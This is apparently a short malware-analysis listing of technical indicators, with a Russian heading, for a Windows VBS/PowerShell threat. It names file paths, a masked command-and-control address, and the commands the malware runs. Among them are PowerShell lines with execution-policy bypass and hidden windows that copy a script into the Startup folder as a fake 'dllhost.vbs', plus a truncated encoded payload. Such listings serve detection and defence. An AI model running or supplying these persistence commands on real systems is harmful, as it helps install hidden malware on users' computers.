Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\dllhost.vbs
- %TEMP%\xscv.vbs
- '84.##.52.166':12
- '<SYSTEM32>\wscript.exe' "%TEMP%\xscv.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\xscv.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\xscv.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.vbs';' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABkAGwAbABoAG8AcwB0AFwAKQAuAGQAbABsAGgAbwBzA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABkAGwAbABoAG8AcwB0AFwAKQAuAGQAbABsAGgAbwBzA...